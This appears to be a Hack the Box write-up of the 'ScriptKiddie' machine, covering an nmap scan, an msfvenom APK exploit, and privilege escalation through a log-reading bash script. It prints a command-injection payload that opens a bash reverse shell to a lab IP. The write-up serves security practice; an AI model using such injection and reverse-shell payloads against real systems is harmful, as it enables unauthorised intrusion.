Hack the Box: ScriptKiddie

ScriptKiddie

ScriptKiddie was an easy Hack the Box machine. Main theme of the challenge was hacking an inexperienced hacker with their won tools (hence ScriptKiddie). I’ll exploit a vulnerability in the MSF Venom to gain a local shell. Then, I’ll escalate privileges to another user by exploiting local script’s vulnerability. In the end I’ll create a root shell by running Metasploit console through sudo.

User

Nmap scan reveals a HTTP server on port 5000:

$ nmap scriptkiddie.htb -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-21 16:19 CET
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.042s latency).
Other addresses for scriptkiddie.htb (not scanned): 10.10.10.226
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The webpage is an interface to 3 “hacking” tools: nmap, msfvenom, and searchsploit.

Ironically , I can use searchsploit to find a pretty vulnerability in the msfvenom:

Using the Metasploit I’ll generate a APK file that will return shell:

Uploading generated file to the site’s Msfvenom will spawn a shell:

Using that shell I can grab the user flag:

Root

In the /home/pwn/ folder there’s a script that runs nmap scans on “hackers” that appear in the /home/kid/logs/hackers file.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

As a kid user I have control over the hackers file. The nmap call is vulnerable to the command injection. The following payload should return a reverse shell:

echo "a a ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.12/444 0>&1' #" > /home/kid/logs/hackers

The pwn user can sudo msfconsole without password:

Metasploit console can be use to spawn a shell and grab flag:

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Five Challenges Enterprises Face With Their Data Backup Solutions

Security Implications of Cloud Computing

Secure & Agile: An Intelligent Approach to Information Security

Creating Strong Passwords — 6 Things to Consider

{UPDATE} Ανατρεπόμενο φορτηγό Σαλόνι Auto Επισκευή: Πλύση Hack Free Resources Generator

The Code Enigma website is now fully GDPR compliant

Two heart shaped lollipops held against a pink background

{UPDATE} Space Cats Pop Hack Free Resources Generator

Litentry Crowdloan Follow-up and Looking Into Polkadot Auction Batch 2

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Local Attack Using a Backdoor Shell

Antivirus Evasion With Shellter

UTCTF 2021 — Oinker

HTB Starting Point-Redeemer